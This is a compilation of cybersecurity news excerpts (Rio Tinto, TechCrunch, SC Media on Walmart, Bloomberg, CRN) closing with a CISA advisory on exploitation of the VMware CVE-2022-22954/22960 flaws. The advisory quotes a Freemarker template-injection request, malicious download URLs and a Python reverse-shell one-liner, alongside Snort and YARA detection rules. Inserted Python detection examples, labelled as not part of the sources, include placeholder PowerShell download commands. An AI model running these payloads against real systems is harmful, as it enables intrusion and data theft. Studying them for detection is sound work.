Category: Uncategorized

  • Cyber Security – Rio Tinto

    We invest in enhancing our cyber security measures, ensuring we not only adapt to new and emerging technologies and cyber threats but also continue to improve the resilience of our business operations overall.
    We respect every person’s privacy and comply with all relevant laws in the collection, use and protection of personal information in connection with our business.
    When we work with others who may see or process our data – from business partners to suppliers, to customers – we make clear how important privacy is to us and the standards they must meet to work with us. We only collect and handle personal information when needed, and only for legitimate business purposes.
    We have identified cyber security as a principal operational risk with potential to impact people, environment, community and operational performance – including our supply chain.
    Our Cyber Security Steering Committee (CSSC) is our primary governance body overseeing cyber security. The CSSC, which reports to the Group’s Executive Committee, is responsible for our cyber strategy and provides oversight for Group-wide initiatives.  
    We invest in our information systems and technology infrastructure and teams to advance our digital agenda while also safeguarding our assets. Key measures include:
    Maintaining strong cyber security awareness is more important than ever. We have improved our cyber security training and awareness programme, including improving the quality of our Group-wide mandatory training to address specific risks, continuous engagement of cyber security topics through various internal channels and forums, targeted campaigns (including about phishing trends and campaigns), executive briefings and tailored support for key business areas.
    Our businesses are required to maintain business resilience management plans to support major incident response and recovery, including cyber security events. We also have a dedicated business resilience management plan for our Information Services and Technology function, which is tested annually.
    © Rio Tinto 2023. All Rights Reserved.
    How we process personal data provided or obtained through this website.
    With the exception of the use of cookies, Rio Tinto generally does not seek to collect personal data through this website.  

    However if you choose to provide personal data to Rio Tinto through this website (for example, by sending us an email), we will process that personal data to answer your query and if relevant, to manage our business relationship with you or your company. We won’t process that personal data for other purposes except where required to meet our legal obligations or otherwise as authorised by law and notified to you.
    If you choose to subscribe to our media releases or other communications, you can unsubscribe at any time (by following the instructions in the email or by contacting us).
    With your consent, our website uses cookies to distinguish you from other users of our website. This helps us to provide you with a good experience when you browse our website and also allows us to improve our site.

    A cookie is a small file of letters and numbers that we store on your browser or the hard drive of your computer if you agree. Cookies contain information that is transferred to your computer’s hard drive.
    As some data privacy laws regulate IP addresses and other information collected through the use of cookies as personal data, Rio Tinto’s processing of such personal data needs to comply with its Data Privacy Standard (see Part 1 of our Privacy Policy), and also applicable data privacy laws.
     

    source

  • Cybersecurity teams, beware: The defender's dilemma is a lie – TechCrunch

    Practically every security professional has run across “the defender’s dilemma” sometime in their career. It goes like this: “Defenders have to be right every time. Attackers only need to be right once.”
    The idea that attackers have all the advantages and that defenders must be passive and wait for something to respond to is practically an axiom of cybersecurity.
    It is also a lie.
    Basing a security strategy around the defender’s dilemma harms your security program. Starting with an incorrect premise leads to bad decisions. You may waste money on products, services or capabilities you don’t truly need or underinvest in the ones you do. Your security staff becomes overwhelmed, demoralized and has trouble delivering good outcomes.

    Defenders rightly expect attackers to lie and cheat to achieve their goals, but sometimes we forget that lying and cheating can work both ways.

    If you believe the lie of the defender’s dilemma, there are other lies you have to believe as well because the defender’s dilemma relies upon them. Let’s look at each of these lies in detail and discuss strategies you can use to negate their harmful effects and turn them into advantages for your team.
    The defender’s dilemma implies that your security team is purely passive, sitting around waiting for attacks to happen. But thinking in terms of “defense” and “offense” is a false dichotomy.
    The Pyramid of Pain shows that by consistently detecting and responding to threat actor activity quickly enough to stop attacks in their tracks, you can impose cost on that actor, turning defense into offense. By concentrating your detection development efforts on the top half of the pyramid, you may not be able to prevent attacks entirely, but you will make actors work harder to be successful. That changes the economics of their attacks and also buys you valuable time to respond.
    Your defenses must operate around the clock, while attackers can carefully choose the timing of their attacks to occur on evenings, weekends or holidays. That doesn’t mean humans always have to be engaged for everything, though.
    Automation and SOAR technology can turn IR playbooks into an automated response. Driving an incident to containment within seconds or minutes of detection and collecting basic IR data along the way improves time-to-containment and significantly decreases reliance on off-hours staffing.
    Consider also what each side is doing in between attacks. While threat actors plan their next attacks, your team should not be sitting idle. Use the time between incidents to level up group capabilities and individual skills. Learn from past incidents to improve detection and playbooks. Take classes or learn new skills. Use threat hunting to identify new detection or IR techniques. What you might have fallen prey to yesterday could be something you detect and interdict tomorrow.
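    The Pyramid of Pain argument above, shown as an added example that is not part of the TechCrunch piece: a toy Python rule set in which three rules key on low-tier indicators and one on behaviour, evaluated against a first sighting and against a later variant that carries a fresh hash, address and domain. Every event, hash, address, domain and rule name is constructed for illustration.

```python
"""Added example (not from the article): why detections at the top of the
Pyramid of Pain keep firing after an actor rotates the cheap indicators at
the bottom.  All values below are constructed; none is a real indicator."""
from dataclasses import dataclass
from typing import Callable, Dict, List

# Pyramid of Pain tiers, cheapest-to-change first; list index is the rank.
TIERS = ["hash", "ip", "domain", "artifact", "tool", "ttp"]


@dataclass(frozen=True)
class Event:
    """One constructed endpoint record: a process start plus its outbound
    connection, which is all the rules below need."""
    parent: str
    child: str
    cmdline: str
    sha256: str
    dst_ip: str
    dst_domain: str


@dataclass(frozen=True)
class Rule:
    name: str
    tier: str                          # one of TIERS
    matcher: Callable[[Event], bool]


def office_spawns_downloader(ev: Event) -> bool:
    """TTP-tier logic: an Office application spawns a script host whose
    command line fetches something from the network.  No file hash,
    address or domain is involved, so rotating those does not help."""
    office = ev.parent.lower() in {"winword.exe", "excel.exe", "outlook.exe"}
    script_host = ev.child.lower() in {"powershell.exe", "wscript.exe", "mshta.exe"}
    cmd = ev.cmdline.lower()
    fetches = any(k in cmd for k in ("invoke-webrequest", "downloadstring", "http://", "https://"))
    return office and script_host and fetches


# Constructed "known bad" values feeding the low-tier rules.
BAD_HASH = "0" * 60 + "bad1"
BAD_IP = "198.51.100.7"              # documentation range (TEST-NET-2)
BAD_DOMAIN = "updates-cdn.invalid"

RULES: List[Rule] = [
    Rule("known_bad_hash", "hash", lambda ev: ev.sha256 == BAD_HASH),
    Rule("known_bad_ip", "ip", lambda ev: ev.dst_ip == BAD_IP),
    Rule("known_bad_domain", "domain", lambda ev: ev.dst_domain == BAD_DOMAIN),
    Rule("office_spawns_downloader", "ttp", office_spawns_downloader),
]


def evaluate(rules: List[Rule], ev: Event) -> Dict[str, bool]:
    """Run every rule against one event: rule name -> fired."""
    return {r.name: r.matcher(ev) for r in rules}


def highest_surviving_tier(rules: List[Rule], ev: Event) -> str:
    """Tier of the most expensive-to-evade rule that fired ('' if none)."""
    fired = [r for r in rules if r.matcher(ev)]
    if not fired:
        return ""
    return max(fired, key=lambda r: TIERS.index(r.tier)).tier


def resilience_report(rules: List[Rule], original: Event, variant: Event) -> Dict[str, object]:
    """Compare what fires on the first sighting and on a later variant with
    a rebuilt payload and fresh infrastructure.  'retained' rules are the
    ones that impose cost; 'lost' rules were one-shot indicator matches."""
    before, after = evaluate(rules, original), evaluate(rules, variant)
    return {
        "lost": sorted(n for n in before if before[n] and not after[n]),
        "retained": sorted(n for n in after if after[n]),
        "tier_before": highest_surviving_tier(rules, original),
        "tier_after": highest_surviving_tier(rules, variant),
    }


# First sighting: every tier of indicator is known to the defender.
ORIGINAL = Event(
    parent="WINWORD.EXE", child="powershell.exe",
    cmdline='powershell -w hidden -c "Invoke-WebRequest http://updates-cdn.invalid/s"',
    sha256=BAD_HASH, dst_ip=BAD_IP, dst_domain=BAD_DOMAIN,
)
# Same tradecraft a week later: new build, new address, new domain.
VARIANT = Event(
    parent="WINWORD.EXE", child="powershell.exe",
    cmdline='powershell -w hidden -c "Invoke-WebRequest http://static-cdn.invalid/s"',
    sha256="f" * 60 + "new2", dst_ip="203.0.113.9", dst_domain="static-cdn.invalid",
)

if __name__ == "__main__":
    for key, value in resilience_report(RULES, ORIGINAL, VARIANT).items():
        print(f"{key}: {value}")
```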

    source

  • Inside Walmart Global Tech: Where cybersecurity isn't discounted – SC Media

    The David Glass Technology Center, headquarters to Walmart Global Tech, in Bentonville, Ark. (Bradley Barth/SC Media)
    The following is the Foreword and Part 1 of a three-part series revealing key highlights from Walmart Global Tech’s Media Day, compiled from a series of on-site tours, fireside chats, panels, roundtables and one-on-one interviews.
    Bookended by security personnel in front and back, we were warned in no uncertain terms before entering Walmart’s East Data Center facility: Any attempt to bring an electronic device into the building would result in our immediate expulsion.
    The caution was understandable. We were, after all, the first-ever visitors who were not a Walmart employee or vendor partner to step foot in this building, where the retail giant’s precious data is collected and processed. This was serious business for the $572.8 billion Fortune 1 company, which invited a small gaggle of reporters to Walmart headquarters in Bentonville, Arkansas, for Walmart Global Tech’s (WGT) inaugural media day.
    Before the day was over, we also were treated to a tour of the on-site security operations center (SOC) and a forensics lab — both located in the David Glass Technology Center, the main headquarters for WGT, Walmart’s internal technology and business services division.
    The event also served as an opportunity to talk to WGT’s top cyber and IT executives about their efforts to innovate as a security and tech leader in a manner that can scale with the retailer’s ongoing world dominance. With roughly 10,500 stores, plus various eCommerce websites under 46 banners in 24 countries, Walmart is not only king in the retail space — it also operates in the health and financial sectors, and has its own manufacturing, distribution and logistics operations to account for.
    So why the sudden willingness to offer the world an inside glimpse of its security operations? According to senior vice president and global CISO Jerry Geisler, it’s all about Walmart’s desire to prove to customers and clients that the company is working hard to earn their trust.
    As an omnichannel retailer, Walmart is aware of how the lines between digital and physical commerce have blurred.
    “With my teams, when we’re thinking about digital trust, of course we’re thinking end-to-end. We’re thinking everywhere we would potentially interact with that customer, when and where they would share data with us, and then how we use that data,” Geisler said. “How is it that we use or protect the data that our customers choose to entrust us with? And more so: How we’re potentially using emerging tech… because we want to enable the business, and part of that enablement is ensuring that we don’t have disruptive events that erode trust.”
    The first sight that caught our eye as we left the reception lobby and marched through the David Glass Technology Center were three trampolines sitting side by side in a cavernous interior space. Wow — is this the most fun place to work or what?
    OK, so actually this was not an office perk, but rather the work of merchandisers who are constantly experimenting with products that ultimately wind up in the stores. And it’s not unusual to see all sorts of unique items being tested on site. There’s always something going on at the Walmart campus, and that’s certainly true on the technology side of things.
    The data center: Despite being connected via an intermediary passageway, the East Data Center is technically inside a completely separate building from the David Glass Technology Center, requiring a stringent security check-in process. Only about 1,000 people per year set foot inside (and typically an NDA is involved), but never anyone from the media — until this day.
    First stop: the C-Floor server room, home to highly sensitive and invaluable threat data leveraged by the incident response team and OneLab forensics teams (other corporate data is stored on the A- and B-Floors).
    This area featured multiple protections against potential physical harm, including a floor-to-ceiling caged partition, leak detection cables and sticky anti-contamination doormats to reduce electrostatic discharge and loose dust particles (“You’ll be working in your socks before you know it,” remarked tour leader Kevin McCoin, distinguished architect, systems engineering, referring to the shoe-stealing sticky mats). The floor was elevated three feet above the concrete base to allow for better air circulation flow, helping to conduct heat from the hot servers outside and cool air back in.
    Moving further inside, we were escorted into a long corridor featuring the critical infrastructure plant facilities designed to keep the servers operating through a series of pumps, motors and industrial controls. There’s a mission statement on the wall in this area: to “provide data center capability and operate data centers in a manner that sustains a highly available and uninterrupted business operation.”
    Different sections of this facility are fully segregated so that if a problem occurs in one section, the others are not affected. The goal is nothing short of 100 percent uptime, and multiple redundancies are the key. If one particular mechanism or system experiences downtime, Walmart relies on built-in automation and AI/machine learning to switch to one of the redundancies, thus maintaining operational stability and continuity.
    We next were ushered over to the B-Floor’s private cloud server room for a fleeting glimpse inside, although we were only allowed to peek from just outside. Just like on the C-Floor, the room works on a grid system — like a big game of Battleship — to help facility workers know exactly where to go to if a problem arises.
    Walmart has made news lately for pursuing a hybrid cloud computing strategy that is increasingly relying on its own private cloud, while mixing in public cloud offerings and edge nodes for ultimate flexibility in what cloud-based resources it uses.
    The SOC: Including this one, Walmart actually operates three SOCs around the world (with the other two in Reston, Virginia, and Bangalore, India). Inside the main hub, the walls were adorned with large screens displaying timely cyber news media articles, the latest vulnerabilities sorted by company and product, summaries of zero-day exploits, and other vital info. Just outside, a hanging whiteboard noted the number of days since the last significant security incident. However, it was completely wiped clean — perhaps in anticipation of the media’s arrival?
    Walmart’s SOC processes roughly 6 trillion points of telemetry and monitors approximately 3 million IP addresses in its network, plus roughly 167,000 public and private GitHub repositories. This requires a tremendous amount of automated monitoring correlation, detection and response mechanisms to aid the various teams that collaborate on security operations.
    Inside a conference room, the heads of these teams laid out for the media a fictionalized scenario in which an imaginary, financially motivated cyber actor sent fake browser updates to Walmart associates in an attempt to get them to open a malicious file infected with a RAT, infostealer or Cobalt Strike file — an intermediary step for a ransomware attack.
    It starts with the threat intelligence team, which creates reports based on the latest available commercial feeds as well as its own collection of TTPs, IOCs and other data points gathered via frameworks like MITRE ATT&CK.
    The threat hunting team uses this intelligence to proactively sniff out threat actors that might be using these identified techniques, and they coordinate with the anomalous endpoint behavior team to spot rare or unusual activity that is indicative of a possible threat. As Vice President of Security Operations Jason O’Dell explained, the corporate philosophy is: “Rare isn’t always bad, but bad should always be rare.”
    And although threat actors are getting better at hiding their malicious traffic, “something’s gonna stand out,” said Vernon Habersetzer, senior enterprise expert, security incident management.
    If an alert is generated through either hunting or through traditional detection and response, the SOC analyst team is on hand to analyze a potential threat and then either take action, elevate to incident response or declare a false positive. From these analysis results, Walmart can then create custom detections for future protection.
    There’s also an engineering team that maintains and stewards the 6 trillion datapoints; a data assurance team that spearheads data loss prevention (they weren’t part of the simulation); and an incident response team that handles containment and threat eradication, much of which is automated if Walmart’s systems detect flagged behavior.
    Finally, there’s a red team, which is tasked with attacking the organization throughout the year to see “how all the controls put in place… stack up,” noted Harold Ogden, red team senior director. Recently, Walmart made the strategic decision to bring the red team — which had been operating as a more segregated entity — in-house in order to create a more collaborative purple teaming environment. (For more on this, see SC Media’s video interview with Jason O’Dell.)
    The forensics lab: The tools and machines found in WGT’s hardware forensics lab evoke, in essence, a living museum that showcases the chronology of device repair and data recovery. This is where malfunctioning or damaged devices and drives end up when the company needs to salvage data from them for reasons ranging from legal discovery to security investigations to personal file restoration. Altogether, the forensics team fulfills more than 3,000 requests per year.
    Inside the room were soldering stations, microscopes, ultrasonic wire bonders, X-ray machines capable of peering into the 10 different layers of smartphones, and a clean room for when a contaminant-free working environment is needed. Several monitors displayed extreme close-ups of chips and circuits from various electronics currently under examination (or perhaps placed there simply as a visual demonstration for us).
    As hardware changes, improves and gets smaller, the equipment used to examine it must evolve as well. Over the years, Walmart has found that it’s ideal to handle such tasks internally, rather than rely on a third party, which presents complications related to chain of custody, data privacy and expense, explained Wayne Murphy, distinguished architect, systems engineering, and hardware recovery expert.
    Indeed, just as Walmart realized there were advantages to setting up its own distribution and manufacturing operations, Walmart has resolved to become a self-reliant corporation when it comes to data collection, cybersecurity and forensics. Considering its vast resources and infrastructure, Walmart probably could form its own managed IT and cyber services company if it so desired. And at this point, would it even be surprising if they did?
    Stay tuned for Part 2 of SC Media’s Walmart Global Tech Media Day coverage, featuring the retailer’s latest cyber innovations and initiatives.
    As director of community content at CyberRisk Alliance, Bradley Barth develops content for SC Media online conferences and events, as well as video/multimedia projects. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.


    Copyright © 2023 CyberRisk Alliance, LLC All Rights Reserved. This material may not be published, broadcast, rewritten or redistributed in any form without prior authorization.

    source

  • UK Engineering Company Vesuvius Hit by Cyber Attack – Bloomberg

    UK engineering company Vesuvius Plc said it’s managing a cyber-security incident involving unauthorized access to its systems.
    The molten metal flow control firm has shut down affected systems and initiated steps to assess the scale of the attack, it said in a statement on Monday. The shares fell as much as 3.1% in early trading in London.

    source

  • UK's National Cyber Security Center Also Looking Into ION Hack – Bloomberg

    A screenshot from the ION website. 

    The National Cyber Security Center, part of UK intelligence agency Government Communications Headquarters, is part of the growing number of government bodies examining the cyberattack on ION Trading UK.
    The NCSC joins the Financial Conduct Authority, the Prudential Regulation Authority and the US Federal Bureau of Investigation in seeking information about the incident, according to people familiar with the matter, who aren’t authorized to speak publicly.

    source

  • 10 Cybersecurity Companies Making Moves: January 2023 – CRN

    We’re taking a look at the cybersecurity companies that launched products and partner program updates, made key executive changes, raised funding or announced acquisitions in January.
    While plenty of cybersecurity companies have been among the tech industry vendors recently announcing layoffs, many companies in the security market had happier news to announce in kicking off 2023. In January, major moves by cybersecurity companies included executive changes, such as CrowdStrike’s hiring of two C-level executives from rival endpoint security vendor SentinelOne.
    Meanwhile, a number of cybersecurity vendors announced channel-friendly products, such as Arctic Wolf, while others unveiled updates to their partner programs, including Palo Alto Networks. A few raised funding, including Snyk’s funding round from ServiceNow, while NetSPI was among the handful of cybersecurity companies to announce an acquisition in spite of the uncertain economic environment.
    What follows are details on 10 of the cybersecurity companies we’re following that made moves in January.
    Kyle Alspach is a Senior Editor at CRN focused on cybersecurity. His coverage spans news, analysis and deep dives on the cybersecurity industry, with a focus on fast-growing segments such as cloud security, application security and identity security.  He can be reached at kalspach@thechannelcompany.com.

    source

  • Threat Actors Chaining Unpatched VMware Vulnerabilities for Full … – CISA

    Update June 2, 2022:
    This Cybersecurity Advisory (CSA) has been updated with additional indicators of compromise (IOCs) and detection signatures, as well as tactics, techniques, and procedures (TTPs) from trusted third parties. 
    Update End
    The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this CSA to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). 
    VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5 and May 6, 2022, respectively.
    Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.
    CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including IOCs—about observed exploitation at multiple other large organizations from trusted third parties.
    This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. 
    Update June 2, 2022:
    This CSA also provides TTPs of this activity from trusted third parties to assist administrators with detecting and responding to this activity. 
    Update End
    Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with internet-facing affected systems—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.
    Download the PDF version of this report (pdf, 349kb).
    For a downloadable copy of IOCs, see AA22-138B.stix
    CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.
    According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems. 
    Update June 2, 2022:
    For more information about this compromised organization, see the Victim 1 section.
    Update End
    Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell, a publicly available webshell that includes command execution, a file manager, a database manager, and a port scanner. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.
    Update June 2, 2022:
    The following sections include additional information, including IOCs and TTPs, from trusted third parties about two confirmed compromises. See the appendix for TTPs in this CSA mapped to the MITRE ATT&CK for Enterprise framework.
    The trusted third party assesses that multiple threat actors (referred to as Threat Actor 1 [TA1] and Threat Actor 2 [TA2]) gained access to a public-facing server running VMWare Workspace ONE Access. TA1 downloaded a malicious shell script, which they used to collect and exfiltrate sensitive data. TA2 interacted with the server (without automation or scripts) and installed multiple webshells and a reverse secure socket (SOCKS) proxy.
    On April 12, TA1 exploited CVE 2022-22954 [T1203] to download [T1105] a malicious shell script [T1059] from https://20.232.97[.]189/up/80b6ae2cea.sh
    TA1 first targeted Freemarker—a legitimate application that allows for customized notifications by creating templates—to send the following customized GET request URI to the compromised server [T1071.001]:
    GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7D HTTP/1.1
    The GET request resulted in the server downloading the malicious shell script, 80b6ae2cea[.]sh, to VMware Workspace ONE Access directory /usr/local/horizon/scripts/. TA1 then chained CVE 2022-22960 to the initial exploit to run the shell script with root privileges ([T1068], [TA0004]). The script was executed with the SUDO command.
    The script, which contained VMware Workspace ONE Access directory paths and file locations, was developed for data exfiltration [TA0010]. The malicious script collected [TA0009] sensitive files–including user names, passwords, master keys, and firewall rules–and stored them in a “tar ball” (a “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration) [T1560]. The tar ball was located in a VMWare Workspace ONE Access directory: /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/.
    The malicious script then deleted evidence of compromise [TA0005] by modifying logs to their original state and deleting files [T1070]. TA1 deleted many files and logs, including fd86ald0.pem, localhost_access logs, logs associated with the VMWare Horizon application, and greenbox logs for the date of activity (April 12).
    Note: CISA received a similar malicious Bash script for analysis from a trusted third party at a different known compromise. See Victim 2 section for more information.
    On April 12, TA1 also downloaded jtest.jsp, a JSP webshell, to the server’s web directory /SAAS/Horizon/js-lib/ from IP address 186.233.187[.]245.
    TA1 returned to the server on April 12 to collect sensitive data stored in the “tar ball” by GET request.
    On April 13 and 14, TA2 sent many GET requests to the server exploiting—or attempting to exploit—CVE 2022-22954 to obtain RCE, upload binaries, and upload webshells [T1505.003] for persistence [TA0003].
    The trusted third party found two copies of the Dingo J-spy webshell (MD5 5b0bfda04a1e0d8dcb02556dc4e56e6a) in web directories: horizon_all.jsp was in the /opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/ web directory and jquery.jsp was in the /webapps/cas/static/ directory. The third party was unable to determine how and when the webshells were created. TA2 used POST requests to communicate with the Dingo J-spy webshells. The commands and output were encrypted with an XOR key [T1573.001].
    On April 14, TA2 downloaded a reverse SOCKS proxy [T1090]. TA2 first sent a GET request with the CHMOD command to change the permissions of .tmp12865xax, a hidden file in the /tmp directory [T1222.002]. The actor then downloaded a binary (MD5 dc88c5fe715b5f706f9fb92547da948a) from https://github[.]com/kost/revsocks/releases/download/v1.1.0/revsocks_linux_amd64. The binary is a reverse socks5 tunneling binary with TLS/SSL support and connects to https://149.248.35[.]200.sslip.io.
    The trusted third party observed additional threat actor activity that does not seem to be related to TA1 or TA2. On 13 April, IP address 172.94.89[.]112 attempted to connect a reverse shell on the compromised server to IP Address 100.14.239[.]83 on port 5410. The threat actor used the following command:
    freemarker.template.utility.Execute"?new()("/usr/bin/python3.7 -c  \'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s. connect((\"100[.]14[.]239[.]83\",5410));os.dup2(s.fileno(),0);  os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"- i\"]);\'")}  
    CISA received a related malicious Bash script for analysis from a trusted third party. The analyzed script, deployed on or around April 12, exploits CVE 2022-22960 and allows a Horizon user to escalate privileges and execute commands and scripts as a superuser (sudo). The Bash script also allows the user to collect network information and additional information.
    The script overwrites the publishCaCert.hzn script on fd86ald0.pem file and executes commands that compress a list of files containing information such as network interface configuration, list of users, passwords, masterkeys, hosts, and domains to a TAR archive. The TAR archive, located in a VMWare Workspace ONE Access directory, /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/, is assigned read and write permissions to the Horizon web user and read to all users.  
    The malicious script deletes evidence of compromise by overwriting publishCaCert.hzn with fd86ald0.pem and then removing fd86ald0.pem.
    The trusted third party observed the following IPs downloading, executing, and checking the bash script.
    The trusted third party observed the following additional malicious IPs:
    Update End
    Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.
    The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:
    alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content:"GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954; reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)
    The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:
    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection"; content:"GET"; http_method; content:"freemarker.template.utility.Execute"; nocase; http_uri; priority:1; sid:10000001; rev:1;)
    Update June 2, 2022:
    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection"; content:"GET"; http_method; content:"freemarker.template.utility.Execute"; nocase; http_uri; priority:1; sid:100000001; rev:1;)
    Update End
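    The Snort signatures above match on the raw request URI as it crosses the wire, while the log-hunting guidance in this advisory asks administrators to URL-decode greenbox_web.log before searching for the Freemarker marker. The Python below, added here as an example and not code from CISA, VMware or the third party, does both over access-log style lines: it decodes each URI (up to twice, so a double-encoded payload is not missed), flags lines that carry freemarker.template.utility.Execute, records whether the path also matches the CISA signature's prefix, and extracts the shell command handed to Execute so the analyst can see what was attempted. The log lines are constructed for illustration (timestamps and client addresses are made up); the request URIs are the ones quoted in the advisory. The "METHOD URI HTTP/x.y" log layout is an assumption.

```python
"""Flag CVE-2022-22954-style SSTI requests in web log lines.

Added example; not CISA, VMware, or third-party code. Log lines below are
constructed for illustration, but the request URIs are the ones quoted in
the advisory. Assumes a common access-log layout ("METHOD URI HTTP/x.y").
"""
import re
from urllib.parse import unquote

# Marker used by the third-party Snort signature and the greenbox_web.log guidance.
SSTI_MARKER = "freemarker.template.utility.Execute"
# URI prefix the CISA-created Snort signature keys on.
TARGET_PATH = "/catalog-portal/ui/oauth/verify"
# Captures the shell command handed to Execute: ...?new()("<command>")}
_CMD_RE = re.compile(r'Execute"\?new\(\)\("(.*?)"\)\}')
# Request line inside an access-log entry.
_REQ_RE = re.compile(r'"?(GET|POST|PUT|HEAD)\s+(\S+)')


def decode_uri(uri: str, rounds: int = 2) -> str:
    """URL-decode repeatedly (default twice) so a double-encoded payload is not missed."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def hunt(log_lines):
    """Return one finding per line whose decoded URI carries the SSTI marker."""
    findings = []
    for line in log_lines:
        req = _REQ_RE.search(line)
        if req is None:
            continue
        method, raw_uri = req.group(1), req.group(2)
        decoded = decode_uri(raw_uri)
        if SSTI_MARKER not in decoded:
            continue
        cmd = _CMD_RE.search(decoded)
        findings.append({
            "method": method,
            # True when the CISA signature's path prefix also matches.
            "path_match": decoded.startswith(TARGET_PATH),
            "command": cmd.group(1) if cmd else None,
            "line": line,
        })
    return findings


# Constructed sample lines (timestamps and client IPs are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Apr/2022:10:00:00 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=abc123 HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Apr/2022:10:01:00 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7D HTTP/1.1" 200 2048',
    # Same technique, payload double-encoded: a single decode pass would miss the marker.
    '198.51.100.7 - - [12/Apr/2022:10:02:00 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%2528%2529%2528%2522cat%2520/etc/hosts%2522%2529%257D HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['method']} path_match={f['path_match']} command={f['command']!r}")
```

    Run it against the decoded or raw greenbox_web.log and any front-end access log; a hit with path_match false still deserves a look, since the third-party signature does not restrict the path either. The advisory notes the marker can appear legitimately, so the extracted command is what separates a template rendering from a shell invocation.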
    The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:
    rule dingo_jspy_webshell
    {
    strings:
    $string1 = "dingo.length"
    $string2 = "command = command.trim"
    $string3 = "commandAction"
    $string4 = "PortScan"
    $string5 = "InetAddress.getLocalHost"
    $string6 = "DatabaseManager"
    $string7 = "ExecuteCommand"
    $string8 = "var command = form.command.value"
    $string9 = "dingody.iteye.com"
    $string10 = "J-Spy ver"
    $string11 = "no permission ,die"
    $string12 = "int iPort = Integer.parseInt"
    condition:
    filesize < 50KB and 12 of ($string*)
    }

